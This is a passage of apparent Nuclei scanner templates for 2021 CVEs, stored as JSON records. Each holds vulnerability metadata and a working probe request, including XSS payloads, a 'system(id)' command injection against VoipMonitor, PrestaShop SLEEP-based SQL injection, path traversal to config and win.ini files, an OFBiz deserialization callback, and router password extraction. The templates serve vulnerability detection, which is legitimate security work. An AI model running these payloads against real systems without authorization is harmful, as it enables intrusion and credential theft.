"a91676f1e21fb7ca3add00d5767e5ee2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833d" }, "name": "CVE-2021-30049.yaml", "content": "id: CVE-2021-30049\n\ninfo:\n name: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SysAid Technologies 20.3.64 b14 to mitigate the XSS vulnerability.\n reference:\n - https://eh337.net/2021/03/30/sysaid/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30049\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30049\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42156\n cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sysaid\n product: sysaid\n tags: cve2021,cve,xss,sysaid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022028b94d02cab2dca2d269c060aa0ff187310ad35a3917e3e696e358740268283f022100c91d9c5464fb7277fab1b843d65f55ca0dd5bc4b90d3e89464eb55cd8062d9b1:922c64590222798bb761d5b6d8e72950", "hash": "7ea039a90540570d37381d9faae05be8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833e" }, "name": "CVE-2021-30128.yaml", "content": "id: CVE-2021-30128\n\ninfo:\n name: Apache OFBiz <17.12.07 - Arbitrary Code Execution\n author: For3stCo1d\n severity: critical\n description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.\n reference:\n - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30128\n - http://www.openwall.com/lists/oss-security/2021/04/27/5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-30128\n cwe-id: CWE-502\n epss-score: 0.62199\n epss-percentile: 0.97748\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: ofbiz\n fofa-query: app=\"Apache_OFBiz\"\n tags: cve2021,cve,apache,ofbiz,deserialization,rce\n\nhttp:\n - raw:\n - |\n POST /webtools/control/SOAPService HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}\n \n \n \n \n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - 'value=\"errorMessage\"'\n# digest: 490a004630440220198d21301bb0cc9c3eca7b3090244d4d6af10af1c8535d48b44443bc399a45a60220120ccdf8a168a43e6464f01e26d331f958ed562b71f2f1a0038dc57f6336595f:922c64590222798bb761d5b6d8e72950", "hash": "be592a82a89d8e5b47e3a39603e2f45a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833f" }, "name": "CVE-2021-30134.yaml", "content": "id: CVE-2021-30134\n\ninfo:\n name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30134\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30134\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: php_curl_class_project\n product: php_curl_class\n google-query: inurl:\"/php-curl-test/post_file_path_upload.php\"\n tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'key\":\"\"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022054a7b10e32bdea6ad4464c85b29694b0a5fefd2b52c45ea6881458499ce110f6022074ab27b57a2dff0fa2011fb0edc23bda373e4d309c0498cf1470984592c44738:922c64590222798bb761d5b6d8e72950", "hash": "4f70e494bef68f66f327d8cc99a3d9b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308340" }, "name": "CVE-2021-30151.yaml", "content": "id: CVE-2021-30151\n\ninfo:\n name: Sidekiq <=6.2.0 - Cross-Site Scripting\n author: DhiyaneshDk\n severity: medium\n description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.\n remediation: |\n Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/mperham/sidekiq/issues/4852\n - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30151\n - https://lists.debian.org/debian-lts-announce/2023/03/msg00011.html\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30151\n cwe-id: CWE-79\n epss-score: 0.00574\n epss-percentile: 0.77475\n cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: contribsys\n product: sidekiq\n shodan-query: title:\"Sidekiq\"\n tags: cve2021,cve,xss,sidekiq,authenticated,contribsys\n\nhttp:\n - raw:\n - |\n POST /api/auth HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n - |\n GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'onmouseover=\"alert(document.domain)'\n - 'sidekiq'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220130538944f3f1871ac5aeb68f5998d755e83750ee3dac79cd8b56281de5701bd022001daf8dcf6c2450756a9327e75db2241d0fa9df706b70d735eeb121711653abc:922c64590222798bb761d5b6d8e72950", "hash": "d427987973d57218d968e050e4746a8e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308341" }, "name": "CVE-2021-3017.yaml", "content": "id: CVE-2021-3017\n\ninfo:\n name: Intelbras WIN 300/WRN 342 - Credentials Disclosure\n author: pikpikcu\n severity: high\n description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.\n impact: |\n An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network.\n remediation: |\n Update the router firmware to the latest version, which includes a fix for the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3017\n - https://pastebin.com/cTYTf0Yn\n - https://github.com/bigblackhat/oFx\n - https://github.com/openx-org/BLEN\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-3017\n epss-score: 0.01527\n epss-percentile: 0.86768\n cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: intelbras\n product: win_300_firmware\n tags: cve2021,cve,exposure,router,intelbras\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.asp\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'def_wirelesspassword ='\n - 'Roteador Wireless'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'def_wirelesspassword = \"([A-Za-z0-9=]+)\";'\n part: body\n# digest: 490a00463044022046f96617b2d3f46fb61daf58af99864f5885417b5db82f144672de11b88aee0b02204fc94b7179768b51a7e4285534b628216666e5a2f21f503770ec483aa16e7c3a:922c64590222798bb761d5b6d8e72950", "hash": "70e9ff11d6945570ec9a5ef75054f7c7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308342" }, "name": "CVE-2021-30175.yaml", "content": "id: CVE-2021-30175\n\ninfo:\n name: ZEROF Web Server 1.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0.\n reference:\n - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30175\n - https://pro.zerof.ru\n - https://github.com/awillix/research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-30175\n cwe-id: CWE-89\n epss-score: 0.05126\n epss-percentile: 0.92775\n cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zerof\n product: web_server\n tags: cve2021,cve,zerof,sqli\n\nhttp:\n - raw:\n - |\n POST /HandleEvent HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"You have an error in your SQL syntax\"\n\n - type: word\n part: header\n words:\n - \"ZEROF\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022066b28106254e20b51249bccd4a6755378cf7bd895b20f4a7cd38193a27913081022024e2161db17ae6f5c03b0ef08c86ddc750b8b80e096c106097c2b90aa5d07b83:922c64590222798bb761d5b6d8e72950", "hash": "351dde6466e23a9db35312a9b1b7080b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308343" }, "name": "CVE-2021-3019.yaml", "content": "id: CVE-2021-3019\n\ninfo:\n name: ffay lanproxy Directory Traversal\n author: pikpikcu\n severity: high\n description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.\n remediation: |\n Apply the latest patch or upgrade to a version that has fixed the vulnerability.\n reference:\n - https://github.com/ffay/lanproxy/commits/master\n - https://github.com/maybe-why-not/lanproxy/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3019\n - https://github.com/manas3c/CVE-POC\n - https://github.com/sobinge/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-3019\n cwe-id: CWE-22\n epss-score: 0.00832\n epss-percentile: 0.81646\n cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lanproxy_project\n product: lanproxy\n tags: cve2021,cve,lanproxy,lfi,lanproxy_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../conf/config.properties\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n condition: and\n\n - type: word\n part: body\n words:\n - \"config.admin.username\"\n - \"config.admin.password\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100823507dd00b2974bdd4f0260d6614312eb2103421df54d284e01eb0a9b14620d0221008f77848c7872a70284b767b35da931c4650b4726930dcd0501409cb1332098f1:922c64590222798bb761d5b6d8e72950", "hash": "1a00b404df6f064aa759e94053e0341f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308344" }, "name": "CVE-2021-30213.yaml", "content": "id: CVE-2021-30213\n\ninfo:\n name: Knowage Suite 7.3 - Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3.\n reference:\n - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30213\n - https://github.com/piuppi/Proof-of-Concepts\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30213\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42145\n cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eng\n product: knowage\n tags: cve2021,cve,xss,knowage,eng\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cfbbf3db9a769e00375b35c64dca16ef254e615b0d407880713bb95445b66706022100bf105f676804f221b9236fe9820577fc487333145d8debcdecbafbc7b620a01f:922c64590222798bb761d5b6d8e72950", "hash": "87972b0ada6b6fb85a3c01a56a25c0fa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308345" }, "name": "CVE-2021-30461.yaml", "content": "id: CVE-2021-30461\n\ninfo:\n name: VoipMonitor <24.61 - Remote Code Execution\n author: shifacyclewala,hackergautam\n severity: critical\n description: |\n VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30461\n - https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-30461\n cwe-id: CWE-94\n epss-score: 0.96262\n epss-percentile: 0.99416\n cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: voipmonitor\n product: voipmonitor\n shodan-query: http.title:\"VoIPmonitor\"\n tags: cve2021,cve,rce,voipmonitor\n\nhttp:\n - raw:\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: application/x-www-form-urlencoded\n\n SPOOLDIR=test\".system(id).\"&recheck=Recheck\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"groups=\"\n - \"VoIPmonitor installation\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205be3afa5e166bb60f492d734f2482484d4ad69393104a82b4a48b56682ec1826022100f14cf4f4f25a436f1c9a8df7e69804e2f6eb76231534db52d1a6c2c4b9e75d60:922c64590222798bb761d5b6d8e72950", "hash": "99ae200231e479e260e03caf3ab4a015", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308346" }, "name": "CVE-2021-30497.yaml", "content": "id: CVE-2021-30497\n\ninfo:\n name: Ivanti Avalanche 6.3.2 - Local File Inclusion\n author: gy741\n severity: high\n description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/\n - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US\n - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-30497\n cwe-id: CWE-22\n epss-score: 0.95284\n epss-percentile: 0.99297\n cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:*\n metadata:\n max-request: 1\n vendor: ivanti\n product: avalanche\n framework: windows\n tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"for 16-bit app support\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203161ea5c26c4c512386e2efe937f9ae5b4d1450eee8b0a2d7c58cc7e6cb181c4022012d878b741870619e46248e6c0979e2defbed91775c861658417c3125cbdbb99:922c64590222798bb761d5b6d8e72950", "hash": "de5a37b637297b59f0f6b8456daf4e0f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308347" }, "name": "CVE-2021-3110.yaml", "content": "id: CVE-2021-3110\n\ninfo:\n name: PrestaShop 1.7.7.0 - SQL Injection\n author: Jaimin Gondaliya\n severity: critical\n description: |\n PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop.\n reference:\n - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e\n - https://www.exploit-db.com/exploits/49410\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3110\n - https://medium.com/%40gondaliyajaimin797/cve-2021-3110-75a24943ca5e\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-3110\n cwe-id: CWE-89\n epss-score: 0.83896\n epss-percentile: 0.98387\n cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: prestashop\n product: prestashop\n tags: cve,cve2021,sqli,prestshop,edb,prestashop\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"average_grade\")'\n condition: and\n# digest: 4a0a0047304502200c34a850d39fbeeddbc540d1d52ba9d67b8a5204578f8e85b7f4eb94e0afb1830221009b0894c1fc99cb6734f92c3f89d62c547c7a350f7e0f4c6b5edacd23e5a8ae19:922c64590222798bb761d5b6d8e72950", "hash": "414f9ba5725fa694d1185e41528eae90", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308348" }, "name": "CVE-2021-31195.yaml", "content": "id: CVE-2021-31195\n\ninfo:\n name: Microsoft Exchange Server - Cross-Site Scripting\n author: infosecsanyam\n severity: medium\n description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Apply the latest security updates provided by Microsoft to mitigate this vulnerability.\n reference:\n - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31195\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-31195\n cwe-id: CWE-79\n epss-score: 0.92095\n epss-percentile: 0.98883\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: exchange_server\n shodan-query: http.title:\"Outlook\"\n tags: cve2021,cve,microsoft,exchange,owa,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'alert(document.domain)//&et=ServerError'\n - 'mail/bootr.ashx'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100add3f33b9d2e9d57977208908f642566e5d796379120daba28b5ee7685d38b7702204fc9e494046fce48f88b428f7fc426ddca6906f03364c55c0ca03adc357c0660:922c64590222798bb761d5b6d8e72950", "hash": "7f7306221bf70381a892c43f481573bf", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308349" }, "name": "CVE-2021-31249.yaml", "content": "id: CVE-2021-31249\n\ninfo:\n name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection\n author: geeknik\n severity: medium\n description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the vulnerability.\n reference:\n - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249\n - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html\n - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31249\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-31249\n cwe-id: CWE-74\n epss-score: 0.00331\n epss-percentile: 0.68046\n cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chiyu-tech\n product: bf-430_firmware\n tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Location: setting.htm\"\n - \"\"\n condition: and\n\n - type: status\n status:\n - 302\n# digest: 490a004630440220674f7b047dd79b81313c55158e47346df097fea462963ac3b7377e07ea1cae0a0220112a8e30ce253bd1cf3c6c6e4a8f7292c224ce07fdc61717b244fa2799ec5da3:922c64590222798bb761d5b6d8e72950", "hash": "64d95b2585cebf1e657d8b1e7bc97985", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834a" }, "name": "CVE-2021-31250.yaml", "content": "id: CVE-2021-31250\n\ninfo:\n name: CHIYU TCP/IP Converter - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages.\n reference:\n - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250\n - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm\n - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31250\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-31250\n cwe-id: CWE-79\n epss-score: 0.97079\n epss-percentile: 0.99728\n cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chiyu-tech\n product: bf-430_firmware\n tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY\"\n\n headers:\n Authorization: Basic OmFkbWlu\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - text/html\n\n - type: word\n part: body\n words:\n - '\">'\n# digest: 